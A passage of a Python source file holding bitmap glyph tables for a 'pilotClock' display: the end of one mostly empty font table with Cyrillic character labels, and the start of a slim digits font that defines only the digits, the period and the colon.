[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'I'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'J'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'K'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'L'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'M'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'N'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'O'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'P'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'R'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'S'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'T'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'U'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'V'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'W'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'X'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '['
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # backslash
    [0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ']'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '^'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '_'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '`'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'a'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'b'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'c'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'd'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'e'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'f'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'g'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'h'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'i'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'j'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'k'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'l'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'm'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'n'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'o'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'p'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'r'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 's'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 't'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'u'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'v'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'w'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'x'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '{'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '|'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '}'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '~'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x7F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x80 p
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x81 c
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x82 т
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x83 у
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x84 ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x85 x
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x86 ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x87 ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x88 ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x89 щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8A ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8B ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8C ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8D э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8E ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8F я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x90 A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x91 Б
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x92 В
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x93 Г
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x94 Д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x95 E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x96 Ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x97 З
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x98 И
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x99 Й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9A K
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9B Л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9C M
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9D H
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9E O
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9F П
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA0 P
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA1 C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA2 T
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA3 У
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA4 Ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA5 X
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA6 Ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA7 Ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA8 Ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA9 Щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAA Ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAB Ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAC Э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAD Ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAE Ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAF Я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB0 a
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB1 б
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB2 в
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB3 г
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB4 д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB5 e
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB6 ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB7 з
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB8 и
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB9 й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBA к
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBB л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBC м
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBD н
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBE o
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBF п
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xED
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFF
]
#: Bit patterns for the pilotClock Digits, slim style, font height = 10
DIGITS_FONT_SLIM = [
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x00
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x01
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x02
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x03
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x04
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x05
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x06
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x07
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x08
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x09
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x10
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x11
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x12
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x13
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x14
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x15
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x16
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x17
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x18
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x19
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ' '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '!'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '"'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '#'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '$'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '%'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '&'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '''
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '('
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ')'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '*'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '+'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ','
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '-'
[0x0000, 0x0000, 0x0200, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '.'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '/'
[0x01FE, 0x0201, 0x0201, 0x0201, 0x0201, 0x01FE, 0x0000, 0x0000], # '0'
[0x0000, 0x0000, 0x0201, 0x03FF, 0x0200, 0x0000, 0x0000, 0x0000], # '1'
[0x03E1, 0x0211, 0x0211, 0x0211, 0x0211, 0x020E, 0x0000, 0x0000], # '2'
[0x0201, 0x0211, 0x0211, 0x0211, 0x0211, 0x01EE, 0x0000, 0x0000], # '3'
[0x001F, 0x0010, 0x0010, 0x0010, 0x0010, 0x03FF, 0x0000, 0x0000], # '4'
[0x021F, 0x0211, 0x0211, 0x0211, 0x0211, 0x01E1, 0x0000, 0x0000], # '5'
[0x01FE, 0x0211, 0x0211, 0x0211, 0x0211, 0x01E0, 0x0000, 0x0000], # '6'
[0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x03FF, 0x0000, 0x0000], # '7'
[0x01EE, 0x0211, 0x0211, 0x0211, 0x0211, 0x01EE, 0x0000, 0x0000], # '8'
[0x000E, 0x0211, 0x0211, 0x0211, 0x0211, 0x01FE, 0x0000, 0x0000], # '9'
[0x0000, 0x0000, 0x0084, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ':'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ';'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '<'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '='
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '>'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '?'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '@'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'A'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'B'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'C'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'D'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'E'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'F'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'G'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'H'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'I'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'J'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'K'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'L'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'M'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'N'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'O'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'P'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'R'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'S'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'T'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'U'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'V'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'W'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'X'
